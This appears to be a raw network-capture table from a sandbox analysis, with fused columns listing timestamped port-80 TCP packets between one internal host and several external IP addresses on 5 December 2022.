                                                                                                                                                                          Dec 5, 2022 15:19:08.208448887 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.372692108 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.372767925 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373429060 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373522997 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373598099 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373646021 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373691082 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373735905 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.373780966 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.405109882 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.405191898 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.405421019 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.881531000 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:09.897206068 CET4992380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:10.062063932 CET804992338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:10.062344074 CET4992380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:10.062412024 CET4992380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:10.227371931 CET804992338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:10.230767012 CET804992338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:10.230838060 CET804992338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:10.231226921 CET4992380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:10.231337070 CET4992380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:10.396336079 CET804992338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:15.240511894 CET4992480192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:15.251337051 CET804992475.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:15.251596928 CET4992480192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:15.251756907 CET4992480192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:15.262351990 CET804992475.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:15.304797888 CET804992475.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:15.304860115 CET804992475.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:15.305139065 CET4992480192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:16.254836082 CET4992480192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:17.270386934 CET4992580192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:17.281694889 CET804992575.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:17.282008886 CET4992580192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:17.282093048 CET4992580192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:17.293302059 CET804992575.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:17.331285954 CET804992575.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:17.331347942 CET804992575.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:17.331397057 CET804992575.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:17.331540108 CET4992580192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:17.331540108 CET4992580192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:18.285686016 CET4992580192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.301544905 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.312273979 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.312653065 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.314075947 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.314146996 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.314193010 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.324737072 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.324774027 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.324815989 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.324979067 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325015068 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325036049 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.325041056 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325066090 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325089931 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.325093031 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325118065 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325145960 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.325345039 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.325524092 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.335658073 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335695028 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335875034 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335912943 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335941076 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335951090 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.335968018 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335994005 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.335999966 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.336019993 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336046934 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336072922 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336091995 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.336165905 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336241007 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.336281061 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336324930 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336422920 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336431980 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:19.336451054 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336477041 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336503029 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336529016 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336554050 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.336663961 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.346621990 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.346664906 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.346858978 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.346898079 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347103119 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347138882 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347165108 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347381115 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347417116 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347445011 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.347471952 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.366355896 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.366458893 CET804992675.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:19.366632938 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:20.316487074 CET4992680192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:21.331978083 CET4992880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:21.342773914 CET804992875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:21.343008041 CET4992880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:21.343063116 CET4992880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:21.353653908 CET804992875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:21.481894970 CET804992875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:21.481998920 CET804992875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:21.482407093 CET4992880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:21.482511044 CET4992880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:19:21.493043900 CET804992875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:26.488446951 CET4993180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:26.512873888 CET80499312.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:26.513170958 CET4993180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:26.513351917 CET4993180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:26.537504911 CET80499312.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:26.537566900 CET80499312.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:26.537617922 CET80499312.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:26.537781954 CET4993180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:27.518172979 CET4993180192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:28.533612013 CET4993280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:28.557337046 CET80499322.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:28.557873964 CET4993280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:28.558056116 CET4993280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:28.581758022 CET80499322.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:28.581801891 CET80499322.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:28.581810951 CET80499322.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:28.581943989 CET4993280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:29.564824104 CET4993280192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.580132008 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.608484983 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.608791113 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.609400034 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.609488010 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.637578964 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.637672901 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.637717009 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.637758017 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.637778997 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.637824059 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.637952089 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.638000011 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.638123035 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.638283968 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.638308048 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.638600111 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.666138887 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.666199923 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.666261911 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.666301966 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.666445971 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.666549921 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:30.666686058 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.666764021 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.666805983 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.667081118 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.667227030 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695149899 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695211887 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695254087 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695528984 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695713043 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695763111 CET80499332.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:30.695938110 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:31.610738039 CET4993380192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:32.626676083 CET4993480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:32.654642105 CET80499342.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:32.654892921 CET4993480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:32.655055046 CET4993480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:32.682785034 CET80499342.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:32.682847977 CET80499342.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:32.682898045 CET80499342.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:32.683229923 CET4993480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:32.683310032 CET4993480192.168.11.202.57.90.16
                                                                                                                                                                          Dec 5, 2022 15:19:32.711261988 CET80499342.57.90.16192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:37.688689947 CET4993580192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:37.939568996 CET8049935103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:37.939795971 CET4993580192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:37.939928055 CET4993580192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:38.191003084 CET8049935103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:38.191865921 CET8049935103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:38.191929102 CET8049935103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:38.192327023 CET4993580192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:38.201622009 CET8049935103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:38.201927900 CET4993580192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:38.952903032 CET4993580192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:39.968780041 CET4993680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:40.220263958 CET8049936103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:40.220521927 CET4993680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:40.230209112 CET4993680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:40.481959105 CET8049936103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:40.482784986 CET8049936103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:40.482873917 CET8049936103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:40.483177900 CET4993680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:41.233671904 CET4993680192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.249422073 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.500659943 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.501430035 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.503652096 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.754909992 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.754992008 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755034924 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755075932 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755187035 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.755264997 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755268097 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.755332947 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755381107 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755441904 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755528927 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.755675077 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755702972 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.755728960 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:42.755868912 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:42.756042957 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:43.006731987 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.006808043 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.006880045 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.006936073 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.006995916 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:43.007101059 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:43.007416964 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.007488012 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.007559061 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.007622004 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.007810116 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.258399963 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.258564949 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.258647919 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.258974075 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.259140968 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.259263039 CET8049937103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:43.259447098 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:43.514518976 CET4993780192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:44.529994011 CET4993880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:44.780774117 CET8049938103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:44.781021118 CET4993880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:44.781097889 CET4993880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:45.031831026 CET8049938103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:45.032748938 CET8049938103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:45.032840967 CET8049938103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:45.033238888 CET4993880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:45.033366919 CET4993880192.168.11.20103.63.2.175
                                                                                                                                                                          Dec 5, 2022 15:19:45.284166098 CET8049938103.63.2.175192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:58.121313095 CET4994180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:19:58.279850960 CET804994166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:58.280196905 CET4994180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:19:58.280198097 CET4994180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:19:58.438740969 CET804994166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:58.593535900 CET804994166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:58.593600988 CET804994166.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:58.593888044 CET4994180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:19:59.292311907 CET4994180192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:00.307881117 CET4994280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:00.466824055 CET804994266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:00.467030048 CET4994280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:00.467168093 CET4994280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:00.625452995 CET804994266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:00.757002115 CET804994266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:00.757066011 CET804994266.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:00.757312059 CET4994280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:01.479355097 CET4994280192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.501218081 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.660001993 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.660206079 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.660803080 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.660890102 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.819478989 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.819595098 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.819607973 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.819624901 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.819653034 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.819669008 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.819825888 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.819916010 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.820058107 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.820067883 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.820159912 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.820228100 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.820400000 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.980613947 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.980688095 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.980732918 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.980773926 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.980813980 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.980968952 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.980968952 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.980969906 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.980969906 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.981061935 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.983948946 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.984020948 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.984066963 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:02.984110117 CET804994366.29.151.40192.168.11.20
